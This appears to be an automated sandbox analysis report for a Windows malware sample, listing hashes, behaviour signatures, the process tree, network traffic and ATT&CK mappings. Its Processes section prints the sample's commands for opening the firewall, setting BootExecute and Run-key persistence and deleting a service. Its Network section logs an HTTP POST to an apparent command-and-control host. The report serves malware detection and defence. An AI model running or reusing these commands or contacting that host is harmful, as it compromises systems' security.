Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
03/01/2024, 13:24 UTC
Static task
static1
Behavioral task
behavioral1
Sample
3ea4252e1452dd305860829a8c586080.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3ea4252e1452dd305860829a8c586080.exe
Resource
win10v2004-20231215-en
General
-
Target
3ea4252e1452dd305860829a8c586080.exe
-
Size
4.1MB
-
MD5
3ea4252e1452dd305860829a8c586080
-
SHA1
2a03733b26030e760f0fbf6a590b0e2ab5c46917
-
SHA256
ca075adcc5423be5593de955e19ecedba3b99f45887e0412865f137bfd18d555
-
SHA512
0688edb0f573550303c7772ea08b052006d7d50848fe49c422b66a1d12aa80e6515768fdbec35d420b900ee58688b554bdc364f0334b8bbd153e3755039cc05d
-
SSDEEP
98304:jTOhsfJwCcJnsgt1vdo08s2JpQpwh4Vlmfxl7K:jShKxcp99dIJpQp7LmW
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2768 netsh.exe -
Stops running service(s) 3 TTPs
-
Uses Session Manager for persistence 2 TTPs 3 IoCs
Creates Session Manager registry key to run executable early in system boot.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000 reg.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000 reg.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Session Manager\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000 reg.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows32 = "C:\\windows\\system\\system.exe" 3ea4252e1452dd305860829a8c586080.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created \??\c:\windows\SysWOW64\autoconvv.RRI 3ea4252e1452dd305860829a8c586080.exe File opened for modification \??\c:\windows\SysWOW64\autoconvv.RRI 3ea4252e1452dd305860829a8c586080.exe File created C:\Windows\SysWOW64\reg_0001.txt 3ea4252e1452dd305860829a8c586080.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\system32AntiDelete 3ea4252e1452dd305860829a8c586080.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2484 sc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 356 3ea4252e1452dd305860829a8c586080.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 356 wrote to memory of 2484 356 3ea4252e1452dd305860829a8c586080.exe 26 PID 356 wrote to memory of 2484 356 3ea4252e1452dd305860829a8c586080.exe 26 PID 356 wrote to memory of 2484 356 3ea4252e1452dd305860829a8c586080.exe 26 PID 356 wrote to memory of 2484 356 3ea4252e1452dd305860829a8c586080.exe 26 PID 356 wrote to memory of 2660 356 3ea4252e1452dd305860829a8c586080.exe 25 PID 356 wrote to memory of 2660 356 3ea4252e1452dd305860829a8c586080.exe 25 PID 356 wrote to memory of 2660 356 3ea4252e1452dd305860829a8c586080.exe 25 PID 356 wrote to memory of 2660 356 3ea4252e1452dd305860829a8c586080.exe 25 PID 356 wrote to memory of 2744 356 3ea4252e1452dd305860829a8c586080.exe 23 PID 356 wrote to memory of 2744 356 3ea4252e1452dd305860829a8c586080.exe 23 PID 356 wrote to memory of 2744 356 3ea4252e1452dd305860829a8c586080.exe 23 PID 356 wrote to memory of 2744 356 3ea4252e1452dd305860829a8c586080.exe 23 PID 356 wrote to memory of 2764 356 3ea4252e1452dd305860829a8c586080.exe 21 PID 356 wrote to memory of 2764 356 3ea4252e1452dd305860829a8c586080.exe 21 PID 356 wrote to memory of 2764 356 3ea4252e1452dd305860829a8c586080.exe 21 PID 356 wrote to memory of 2764 356 3ea4252e1452dd305860829a8c586080.exe 21 PID 356 wrote to memory of 2768 356 3ea4252e1452dd305860829a8c586080.exe 17 PID 356 wrote to memory of 2768 356 3ea4252e1452dd305860829a8c586080.exe 17 PID 356 wrote to memory of 2768 356 3ea4252e1452dd305860829a8c586080.exe 17 PID 356 wrote to memory of 2768 356 3ea4252e1452dd305860829a8c586080.exe 17
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ea4252e1452dd305860829a8c586080.exe"C:\Users\Admin\AppData\Local\Temp\3ea4252e1452dd305860829a8c586080.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram C:\windows\system\system.exe RPCCC2⤵
- Modifies Windows Firewall
PID:2768
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f2⤵
- Uses Session Manager for persistence
PID:2764
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\ControlSet002\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f2⤵
- Uses Session Manager for persistence
PID:2744
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\ControlSet001\Control\Session manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f2⤵
- Uses Session Manager for persistence
PID:2660
-
-
C:\Windows\SysWOW64\sc.exesc delete GbpSv2⤵
- Launches sc.exe
PID:2484
-
Network
-
Remote address:8.8.8.8:53Requestwww.lech.med.brIN AResponsewww.lech.med.brIN CNAMElech.med.brlech.med.brIN A144.217.240.28
-
Remote address:144.217.240.28:80RequestPOST /imagens/img/index.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: www.lech.med.br
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Location: https://www.lech.med.br/imagens/img/index.php
Content-Length: 253
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
144.217.240.28:80http://www.lech.med.br/imagens/img/index.phphttp3ea4252e1452dd305860829a8c586080.exe524 B 731 B 6 5
HTTP Request
POST http://www.lech.med.br/imagens/img/index.phpHTTP Response
301
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2